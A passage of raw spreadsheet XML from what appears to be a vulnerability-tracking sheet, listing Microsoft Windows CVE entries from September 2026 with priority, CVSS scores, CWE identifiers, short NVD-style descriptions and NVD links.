r="I839" s="5" t="inlineStr" /><c r="J839" s="5" t="inlineStr" /><c r="K839" s="5" t="inlineStr" /><c r="L839" s="5" t="inlineStr" /><c r="M839" s="5" t="inlineStr" /><c r="N839" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O839" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P839" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q839" s="5" t="inlineStr" /><c r="R839" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S839" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T839" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t></is></c></row><row r="840"><c r="A840" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B840" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C840" s="5" t="inlineStr"><is><t>CVE-2026-69313</t></is></c><c r="D840" s="5" t="n"><v>7.1</v></c><c r="E840" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F840" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G840" s="5" t="inlineStr" /><c r="H840" s="5" t="n"><v>0.005</v></c><c r="I840" s="5" t="inlineStr" /><c r="J840" s="5" t="inlineStr" /><c r="K840" s="5" t="inlineStr" /><c r="L840" s="5" t="inlineStr" /><c r="M840" s="5" t="inlineStr" /><c r="N840" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O840" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P840" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q840" s="5" t="inlineStr" /><c r="R840" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S840" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T840" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t></is></c></row><row r="841"><c r="A841" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B841" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C841" s="5" t="inlineStr"><is><t>CVE-2026-69314</t></is></c><c r="D841" s="5" t="n"><v>7.1</v></c><c r="E841" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F841" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G841" s="5" t="inlineStr" /><c r="H841" s="5" t="n"><v>0.005</v></c><c r="I841" s="5" t="inlineStr" /><c r="J841" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K84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841" s="5" t="inlineStr" /><c r="M841" s="5" t="inlineStr" /><c r="N841" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O841" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P841" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q841" s="5" t="inlineStr" /><c r="R841" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S841" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T841" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t></is></c></row><row r="842"><c r="A842" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B842" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C842" s="5" t="inlineStr"><is><t>CVE-2026-69336</t></is></c><c r="D842" s="5" t="n"><v>7.1</v></c><c r="E842" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F842" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G842" s="5" t="inlineStr" /><c r="H842" s="5" t="n"><v>0.005</v></c><c r="I842" s="5" t="inlineStr" /><c r="J842" s="5" t="inlineStr" /><c r="K842" s="5" t="inlineStr" /><c r="L842" s="5" t="inlineStr" /><c r="M842" s="5" t="inlineStr" /><c r="N842" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O842" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P842" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q842" s="5" t="inlineStr" /><c r="R842" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S842" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T842" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t></is></c></row><row r="843"><c r="A843" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B843" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C843" s="5" t="inlineStr"><is><t>CVE-2026-69337</t></is></c><c r="D843" s="5" t="n"><v>7.1</v></c><c r="E843" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F843" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G843" s="5" t="inlineStr" /><c r="H843" s="5" t="n"><v>0.007</v></c><c r="I843" s="5" t="inlineStr" /><c r="J843" s="5" t="inlineStr" /><c r="K843" s="5" t="inlineStr" /><c r="L843" s="5" t="inlineStr" /><c r="M843" s="5" t="inlineStr" /><c r="N843" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O843" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P843" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q843" s="5" t="inlineStr" /><c r="R843" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S843" s="5" t="inlineStr"><is><t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T843" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t></is></c></row><row r="844"><c r="A844" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B844" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C844" s="5" t="inlineStr"><is><t>CVE-2026-69338</t></is></c><c r="D844" s="5" t="n"><v>7.1</v></c><c r="E844" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F844" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G844" s="5" t="inlineStr" /><c r="H844" s="5" t="n"><v>0.005</v></c><c r="I844" s="5" t="inlineStr" /><c r="J844" s="5" t="inlineStr" /><c r="K844" s="5" t="inlineStr" /><c r="L844" s="5" t="inlineStr" /><c r="M844" s="5" t="inlineStr" /><c r="N844" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O844" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P844" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q844" s="5" t="inlineStr" /><c r="R844" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S844" s="5" t="inlineStr"><is><t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T844" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t></is></c></row><row r="845"><c r="A845" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B845" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C845" s="5" t="inlineStr"><is><t>CVE-2026-69340</t></is></c><c r="D845" s="5" t="n"><v>7.1</v></c><c r="E845" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F845" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G845" s="5" t="inlineStr" /><c r="H845" s="5" t="n"><v>0.005</v></c><c r="I845" s="5" t="inlineStr" /><c r="J845" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K84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45" s="5" t="inlineStr" /><c r="M845" s="5" t="inlineStr" /><c r="N845" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O845" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P845" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q845" s="5" t="inlineStr" /><c r="R845" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S845" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T845" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t></is></c></row><row r="846"><c r="A846" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B846" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C846" s="5" t="inlineStr"><is><t>CVE-2026-69357</t></is></c><c r="D846" s="5" t="n"><v>7.1</v></c><c r="E846" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F846" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G846" s="5" t="inlineStr" /><c r="H846" s="5" t="n"><v>0.004</v></c><c r="I846" s="5" t="inlineStr" /><c r="J846" s="5" t="inlineStr" /><c r="K846" s="5" t="inlineStr" /><c r="L846" s="5" t="inlineStr" /><c r="M846" s="5" t="inlineStr" /><c r="N846" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O846" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P846" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q846" s="5" t="inlineStr" /><c r="R846" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S846" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T846" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t></is></c></row><row r="847"><c r="A847" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B847" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C847" s="5" t="inlineStr"><is><t>CVE-2026-69358</t></is></c><c r="D847" s="5" t="n"><v>7.1</v></c><c r="E847" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F847" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G847" s="5" t="inlineStr" /><c r="H847" s="5" t="n"><v>0.005</v></c><c r="I847" s="5" t="inlineStr" /><c r="J847" s="5" t="inlineStr" /><c r="K847" s="5" t="inlineStr" /><c r="L847" s="5" t="inlineStr" /><c r="M847" s="5" t="inlineStr" /><c r="N847" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O847" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P847" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q847" s="5" t="inlineStr" /><c r="R847" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S847" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="T847" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t></is></c></row><row r="848"><c r="A848" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B848" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C848" s="5" t="inlineStr"><is><t>CVE-2026-69364</t></is></c><c r="D848" s="5" t="n"><v>7.1</v></c><c r="E848" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F848" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G848" s="5" t="inlineStr" /><c r="H848" s="5" t="n"><v>0.005</v></c><c r="I848" s="5" t="inlineStr" /><c r="J848" s="5" t="inlineStr" /><c r="K848" s="5" t="inlineStr" /><c r="L848" s="5" t="inlineStr" /><c r="M848" s="5" t="inlineStr" /><c r="N848" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O848" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P848" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q848" s="5" t="inlineStr" /><c r="R848" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S848" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T848" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t></is></c></row><row r="849"><c r="A849" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B849" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C849" s="5" t="inlineStr"><is><t>CVE-2026-69366</t></is></c><c r="D849" s="5" t="n"><v>7.1</v></c><c r="E849" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F849" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G849" s="5" t="inlineStr" /><c r="H849" s="5" t="n"><v>0.006</v></c><c r="I849" s="5" t="inlineStr" /><c r="J849" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K84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49" s="5" t="inlineStr" /><c r="M849" s="5" t="inlineStr" /><c r="N849" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O849" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P849" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q849" s="5" t="inlineStr" /><c r="R849" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S849" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T849" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t></is></c></row><row r="850"><c r="A850" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B850" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C850" s="5" t="inlineStr"><is><t>CVE-2026-69384</t></is></c><c r="D850" s="5" t="n"><v>7.1</v></c><c r="E850" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F850" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G850" s="5" t="inlineStr" /><c r="H850" s="5" t="n"><v>0.004</v></c><c r="I850" s="5" t="inlineStr" /><c r="J850" s="5" t="inlineStr" /><c r="K850" s="5" t="inlineStr" /><c r="L850" s="5" t="inlineStr" /><c r="M850" s="5" t="inlineStr" /><c r="N850" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q850" s="5" t="inlineStr" /><c r="R850" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S850" s="5" t="inlineStr"><is><t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t></is></c><c r="T850" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t></is></c></row><row r="851"><c r="A851" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B851" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C851" s="5" t="inlineStr"><is><t>CVE-2026-69396</t></is></c><c r="D851" s="5" t="n"><v>7.1</v></c><c r="E851" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F851" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G851" s="5" t="inlineStr" /><c r="H851" s="5" t="n"><v>0.005</v></c><c r="I851" s="5" t="inlineStr" /><c r="J851" s="5" t="inlineStr" /><c r="K851" s="5" t="inlineStr" /><c r="L851" s="5" t="inlineStr" /><c r="M851" s="5" t="inlineStr" /><c r="N851" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O851" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P851" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q851" s="5" t="inlineStr" /><c r="R851" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S851" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T851" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t></is></c></row><row r="852"><c r="A852" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B852" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C852" s="5" t="inlineStr"><is><t>CVE-2026-69451</t></is></c><c r="D852" s="5" t="n"><v>7.1</v></c><c r="E852" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F852" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G852" s="5" t="inlineStr" /><c r="H852" s="5" t="n"><v>0.007</v></c><c r="I852" s="5" t="inlineStr" /><c r="J852" s="5" t="inlineStr" /><c r="K852" s="5" t="inlineStr" /><c r="L852" s="5" t="inlineStr" /><c r="M852" s="5" t="inlineStr" /><c r="N852" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O852" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P852" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q852" s="5" t="inlineStr" /><c r="R852" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S852" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T852" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t></is></c></row><row r="853"><c r="A853" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B853" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C853" s="5" t="inlineStr"><is><t>CVE-2026-69460</t></is></c><c r="D853" s="5" t="n"><v>7.1</v></c><c r="E853" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F853" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G853" s="5" t="inlineStr" /><c r="H853" s="5" t="n"><v>0.005</v></c><c r="I853" s="5" t="inlineStr" /><c r="J853" s="5" t="inlineStr" /><c r="K853" s="5" t="inlineStr" /><c r="L853" s="5" t="inlineStr" /><c r="M853" s="5" t="inlineStr" /><c r="N853" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O853" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P853" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q853" s="5" t="inlineStr" /><c r="R853" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S853" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T853" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t></is></c></row><row r="854"><c r="A854" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B854" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C854" s="5" t="inlineStr"><is><t>CVE-2026-69482</t></is></c><c r="D854" s="5" t="n"><v>7.1</v></c><c r="E854" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F854" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G854" s="5" t="inlineStr" /><c r="H854" s="5" t="n"><v>0.003</v></c><c r="I854" s="5" t="inlineStr" /><c r="J854" s="5" t="inlineStr" /><c r="K854" s="5" t="inlineStr" /><c r="L854" s="5" t="inlineStr" /><c r="M854" s="5" t="inlineStr" /><c r="N854" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O854" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P854" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q854" s="5" t="inlineStr" /><c r="R854" s="5" t="inlineStr"><is><t>CWE-379</t></is></c><c r="S854" s="5" t="inlineStr"><is><t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t></is></c><c r="T854" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t></is></c></row><row r="855"><c r="A855" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B855" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C855" s="5" t="inlineStr"><is><t>CVE-2026-69536</t></is></c><c r="D855" s="5" t="n"><v>7.1</v></c><c r="E855" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F855" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G855" s="5" t="inlineStr" /><c r="H855" s="5" t="n"><v>0.004</v></c><c r="I855" s="5" t="inlineStr" /><c r="J855" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K855" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L855" s="5" t="inlineStr" /><c r="M855" s="5" t="inlineStr" /><c r="N855" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O855" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P855" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q855" s="5" t="inlineStr" /><c r="R855" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S855" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T855" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t></is></c></row><row r="856"><c r="A856" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B856" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C856" s="5" t="inlineStr"><is><t>CVE-2026-69553</t></is></c><c r="D856" s="5" t="n"><v>7.1</v></c><c r="E856" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F856" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G856" s="5" t="inlineStr" /><c r="H856" s="5" t="n"><v>0.005</v></c><c r="I856" s="5" t="inlineStr" /><c r="J856" s="5" t="inlineStr" /><c r="K856" s="5" t="inlineStr" /><c r="L856" s="5" t="inlineStr" /><c r="M856" s="5" t="inlineStr" /><c r="N856" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O856" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P856" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q856" s="5" t="inlineStr" /><c r="R856" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S856" s="5" t="inlineStr"><is><t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T856" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t></is></c></row><row r="857"><c r="A857" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B857" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C857" s="5" t="inlineStr"><is><t>CVE-2026-69597</t></is></c><c r="D857" s="5" t="n"><v>7.1</v></c><c r="E857" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F857" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G857" s="5" t="inlineStr" /><c r="H857" s="5" t="n"><v>0.006</v></c><c r="I857" s="5" t="inlineStr" /><c r="J857" s="5" t="inlineStr" /><c r="K857" s="5" t="inlineStr" /><c r="L857" s="5" t="inlineStr" /><c r="M857" s="5" t="inlineStr" /><c r="N857" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O857" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P857" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q857" s="5" t="inlineStr" /><c r="R857" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S857" s="5" t="inlineStr"><is><t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T857" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t></is></c></row><row r="858"><c r="A858" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B858" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C858" s="5" t="inlineStr"><is><t>CVE-2026-69602</t></is></c><c r="D858" s="5" t="n"><v>7.1</v></c><c r="E858" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F858" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G858" s="5" t="inlineStr" /><c r="H858" s="5" t="n"><v>0.006</v></c><c r="I858" s="5" t="inlineStr" /><c r="J858" s="5" t="inlineStr" /><c r="K858" s="5" t="inlineStr" /><c r="L858" s="5" t="inlineStr" /><c r="M858" s="5" t="inlineStr" /><c r="N858" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O858" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P858" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q858" s="5" t="inlineStr" /><c r="R858" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S858" s="5" t="inlineStr"><is><t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T858" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t></is></c></row><row r="859"><c r="A859" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B859" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C859" s="5" t="inlineStr"><is><t>CVE-2026-69688</t></is></c><c r="D859" s="5" t="n"><v>7.1</v></c><c r="E859" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F859" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G859" s="5" t="inlineStr" /><c r="H859" s="5" t="n"><v>0.006</v></c><c r="I859" s="5" t="inlineStr" /><c r="J859" s="5" t="inlineStr" /><c r="K859" s="5" t="inlineStr" /><c r="L859" s="5" t="inlineStr" /><c r="M859" s="5" t="inlineStr" /><c r="N859" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O859" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P859" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q859" s="5" t="inlineStr" /><c r="R859" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S859" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T859" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t></is></c></row><row r="860"><c r="A860" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B860" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C860" s="5" t="inlineStr"><is><t>CVE-2026-69706</t></is></c><c r="D860" s="5" t="n"><v>7.1</v></c><c r="E860" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F860" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G860" s="5" t="inlineStr" /><c r="H860" s="5" t="n"><v>0.004</v></c><c r="I860" s="5" t="inlineStr" /><c r="J860" s="5" t="inlineStr" /><c r="K860" s="5" t="inlineStr" /><c r="L860" s="5" t="inlineStr" /><c r="M860" s="5" t="inlineStr" /><c r="N860" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O860" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P860" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q860" s="5" t="inlineStr" /><c r="R860" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S860" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T860" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t></is></c></row><row r="861"><c r="A861" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B861" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C861" s="5" t="inlineStr"><is><t>CVE-2026-69757</t></is></c><c r="D861" s="5" t="n"><v>7.1</v></c><c r="E861" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F861" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G861" s="5" t="inlineStr" /><c r="H861" s="5" t="n"><v>0.007</v></c><c r="I861" s="5" t="inlineStr" /><c r="J861" s="5" t="inlineStr" /><c r="K861" s="5" t="inlineStr" /><c r="L861" s="5" t="inlineStr" /><c r="M861" s="5" t="inlineStr" /><c r="N861" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O861" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P861" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q861" s="5" t="inlineStr" /><c r="R861" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S861" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T861" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t></is></c></row><row r="862"><c r="A862" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B862" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C862" s="5" t="inlineStr"><is><t>CVE-2026-69761</t></is></c><c r="D862" s="5" t="n"><v>7.1</v></c><c r="E862" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F862" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G862" s="5" t="inlineStr" /><c r="H862" s="5" t="n"><v>0.005</v></c><c r="I862" s="5" t="inlineStr" /><c r="J862" s="5" t="inlineStr" /><c r="K862" s="5" t="inlineStr" /><c r="L862" s="5" 